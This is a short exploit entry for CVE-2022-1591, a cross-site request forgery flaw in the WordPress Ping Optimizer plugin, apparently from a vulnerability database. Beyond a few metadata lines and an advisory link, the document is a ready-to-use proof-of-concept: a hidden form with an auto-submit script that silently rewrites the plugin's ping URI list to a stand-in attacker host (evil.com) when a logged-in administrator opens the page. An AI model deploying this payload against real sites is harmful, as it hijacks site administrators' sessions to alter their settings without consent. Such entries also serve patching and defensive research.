CVE: CVE-2022-1591

Name: WordPress Ping Optimizer (wordpress-ping-optimizer)

Version: 2.35.1.2.3

Date: 2022-04-10 20:14:14

Advisory: https://wpscan.com/vulnerability/b1a52c7e-3422-40dd-af5a-ea4c622a87aa

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=wordpress-ping-optimizer%2Fcbnet-ping-optimizer.php" method="POST">
    <textarea name="cbnetpo[uris]">
http://evil.com


aaaa

bbbb
    </textarea>
    <input type="text" name="cbnetpo[ping]" value="1">
    <input type="text" name="cbnetpo[limit_number]" value="1">
    <input type="text" name="cbnetpo[limit_time]" value="15">
    <input type="text" name="cbnetpo[save]" value="Save Settings">
</form>
<script>
    document.forms[0].submit();
</script>